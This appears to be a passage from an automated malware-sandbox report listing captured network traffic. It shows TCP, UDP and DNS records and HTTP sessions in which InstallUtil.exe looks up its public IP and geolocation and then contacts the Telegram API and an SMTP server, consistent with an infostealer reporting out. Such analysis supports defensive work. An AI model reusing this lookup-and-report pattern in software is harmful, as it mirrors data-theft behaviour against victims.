                                                                                                                                                                    Mar 11, 2025 06:10:40.763462067 CET4974080192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:40.766407013 CET4974180192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:42.491727114 CET44349742104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:42.493666887 CET49742443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:42.493684053 CET44349742104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:42.543528080 CET44349743104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:42.545352936 CET49743443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:42.545372009 CET44349743104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:42.980353117 CET44349742104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:42.980429888 CET44349742104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:42.980535030 CET49742443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:42.981141090 CET49742443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:42.985301018 CET4974080192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:42.986653090 CET4974480192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:43.200967073 CET8049744158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.200983047 CET8049740158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.201069117 CET4974080192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:43.201098919 CET44349743104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.201092958 CET4974480192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:43.201181889 CET44349743104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.201225996 CET49743443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:43.201354027 CET4974480192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:43.201726913 CET49743443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:43.206269026 CET8049744158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.353679895 CET4974180192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:43.358933926 CET8049741158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.359015942 CET4974180192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:43.362276077 CET49745443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:43.362337112 CET44349745149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.362431049 CET49745443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:43.362896919 CET49745443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:43.362910032 CET44349745149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.793822050 CET8049744158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.795388937 CET49746443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:43.795438051 CET44349746104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.795530081 CET49746443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:43.795797110 CET49746443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:43.795811892 CET44349746104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.841443062 CET4974480192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:45.210735083 CET44349745149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:45.210974932 CET49745443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:45.212857962 CET49745443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:45.212867975 CET44349745149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:45.213140011 CET44349745149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:45.214550018 CET49745443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:45.260332108 CET44349745149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:45.625278950 CET44349746104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:45.626995087 CET49746443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:45.627031088 CET44349746104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:45.741005898 CET44349745149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:45.741099119 CET44349745149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:45.741183996 CET49745443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:45.762387991 CET49745443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:46.100775957 CET44349746104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:46.100856066 CET44349746104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:46.100958109 CET49746443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:46.101470947 CET49746443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:46.104734898 CET4974480192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:46.105848074 CET4974780192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:46.109833002 CET8049744158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:46.109918118 CET4974480192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:46.110699892 CET8049747158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:46.110789061 CET4974780192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:46.110882044 CET4974780192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:46.115700960 CET8049747158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:46.695955992 CET8049747158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:46.702601910 CET49748443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:46.702665091 CET44349748104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:46.702729940 CET49748443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:46.703011990 CET49748443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:46.703026056 CET44349748104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:46.749979019 CET4974780192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:48.688457012 CET44349748104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:48.690203905 CET49748443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:48.690253019 CET44349748104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.188817024 CET44349748104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.212374926 CET44349748104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.212505102 CET49748443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:49.212956905 CET49748443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:49.235582113 CET4974780192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:49.236691952 CET4974980192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:49.241055965 CET8049747158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.241131067 CET4974780192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:49.241580009 CET8049749158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.241641998 CET4974980192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:49.241878033 CET4974980192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:49.246718884 CET8049749158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.821760893 CET8049749158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.827111006 CET49750443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:49.827159882 CET44349750104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.827224016 CET49750443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:49.836088896 CET49750443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:49.836116076 CET44349750104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:49.872706890 CET4974980192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:51.674071074 CET44349750104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:51.675717115 CET49750443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:51.675748110 CET44349750104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:51.720437050 CET4975125192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:10:51.720566034 CET4971580192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:52.152093887 CET44349750104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:52.152172089 CET44349750104.21.96.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:52.152242899 CET49750443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:52.152668953 CET49750443192.168.2.5104.21.96.1
                                                                                                                                                                    Mar 11, 2025 06:10:52.163111925 CET4974980192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:52.163995028 CET49753443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:52.164030075 CET44349753149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:52.164084911 CET49753443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:52.164516926 CET49753443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:52.164526939 CET44349753149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:52.168147087 CET8049749158.101.44.242192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:52.168205976 CET4974980192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:10:52.732116938 CET4975125192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:10:53.992244959 CET44349753149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:53.992398977 CET49753443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:53.994050980 CET49753443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:53.994062901 CET44349753149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:53.994405985 CET44349753149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:53.995883942 CET49753443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:54.036329985 CET44349753149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:54.564598083 CET44349753149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:54.564682961 CET44349753149.154.167.220192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:54.564763069 CET49753443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:54.567018032 CET49753443192.168.2.5149.154.167.220
                                                                                                                                                                    Mar 11, 2025 06:10:54.732146978 CET4975125192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:10:58.732254982 CET4975125192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:10:59.692954063 CET4975425192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:10:59.692958117 CET4972880192.168.2.5158.101.44.242
                                                                                                                                                                    Mar 11, 2025 06:11:00.700939894 CET4975425192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:11:02.700942993 CET4975425192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:11:06.716516972 CET4975425192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:11:06.732148886 CET4975125192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:11:14.732218981 CET4975425192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:11:21.830097914 CET4975525192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:11:22.841634989 CET4975525192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:11:24.857237101 CET4975525192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:11:28.857407093 CET4975525192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:11:29.829961061 CET4975625192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:11:30.841613054 CET4975625192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:11:32.841690063 CET4975625192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:11:36.841599941 CET4975625192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:11:36.857238054 CET4975525192.168.2.546.175.148.58
                                                                                                                                                                    Mar 11, 2025 06:11:44.855026007 CET4975625192.168.2.546.175.148.58

                                                                                                                                                                    UDP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Mar 11, 2025 06:09:58.183087111 CET6364553192.168.2.51.1.1.1
                                                                                                                                                                    Mar 11, 2025 06:09:58.189814091 CET53636451.1.1.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:09:59.174424887 CET5916553192.168.2.51.1.1.1
                                                                                                                                                                    Mar 11, 2025 06:09:59.184005022 CET53591651.1.1.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:43.354370117 CET6438053192.168.2.51.1.1.1
                                                                                                                                                                    Mar 11, 2025 06:10:43.361470938 CET53643801.1.1.1192.168.2.5
                                                                                                                                                                    Mar 11, 2025 06:10:51.709068060 CET5711553192.168.2.51.1.1.1
                                                                                                                                                                    Mar 11, 2025 06:10:51.719671965 CET53571151.1.1.1192.168.2.5

                                                                                                                                                                    DNS Queries

                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                    Mar 11, 2025 06:09:58.183087111 CET192.168.2.51.1.1.10x2b24Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:09:59.174424887 CET192.168.2.51.1.1.10xfa64Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:10:43.354370117 CET192.168.2.51.1.1.10x2522Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:10:51.709068060 CET192.168.2.51.1.1.10xbd97Standard query (0)mail.iaa-airferight.comA (IP address)IN (0x0001)false

                                                                                                                                                                    DNS Answers

                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                    Mar 11, 2025 06:09:58.189814091 CET1.1.1.1192.168.2.50x2b24No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:09:58.189814091 CET1.1.1.1192.168.2.50x2b24No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:09:58.189814091 CET1.1.1.1192.168.2.50x2b24No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:09:58.189814091 CET1.1.1.1192.168.2.50x2b24No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:09:58.189814091 CET1.1.1.1192.168.2.50x2b24No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:09:58.189814091 CET1.1.1.1192.168.2.50x2b24No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:09:59.184005022 CET1.1.1.1192.168.2.50xfa64No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:09:59.184005022 CET1.1.1.1192.168.2.50xfa64No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:09:59.184005022 CET1.1.1.1192.168.2.50xfa64No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:09:59.184005022 CET1.1.1.1192.168.2.50xfa64No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:09:59.184005022 CET1.1.1.1192.168.2.50xfa64No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:09:59.184005022 CET1.1.1.1192.168.2.50xfa64No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:09:59.184005022 CET1.1.1.1192.168.2.50xfa64No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:10:43.361470938 CET1.1.1.1192.168.2.50x2522No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                    Mar 11, 2025 06:10:51.719671965 CET1.1.1.1192.168.2.50xbd97No error (0)mail.iaa-airferight.com46.175.148.58A (IP address)IN (0x0001)false

                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                    • reallyfreegeoip.org
                                                                                                                                                                    • api.telegram.org
                                                                                                                                                                    • checkip.dyndns.org

                                                                                                                                                                    HTTP Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.549712158.101.44.242808068C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Mar 11, 2025 06:09:58.201845884 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Mar 11, 2025 06:09:58.804289103 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:09:58 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 32470de83870363cc07df7c112ff262f
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                    Mar 11, 2025 06:09:58.809731007 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Mar 11, 2025 06:09:58.969089031 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:09:58 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 262c9d68585d47dc95266f3d0c60061a
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                    Mar 11, 2025 06:10:01.540587902 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Mar 11, 2025 06:10:04.818378925 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:10:04 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 3289b0b94bdd1d2e85d86153af374771
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.549715158.101.44.242808068C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Mar 11, 2025 06:10:07.197340012 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Mar 11, 2025 06:10:16.672739983 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:10:16 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: abb891f7b2c22e592b1699bf80874c9c
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.549716158.101.44.242807500C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Mar 11, 2025 06:10:10.494441032 CET151OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Mar 11, 2025 06:10:18.796195030 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:10:18 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: aeb2afb853333e428eba3ef7b74f700d
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                    Mar 11, 2025 06:10:18.799894094 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Mar 11, 2025 06:10:24.057415009 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:10:23 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: 8419d03a7368bf471f61d8fef0671484
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                    Mar 11, 2025 06:10:26.454727888 CET127OUTGET / HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                    Mar 11, 2025 06:10:27.801373005 CET321INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Tue, 11 Mar 2025 05:10:27 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 104
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Request-ID: e5d0c04f9f3acc73fb64cc9725911e8d
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
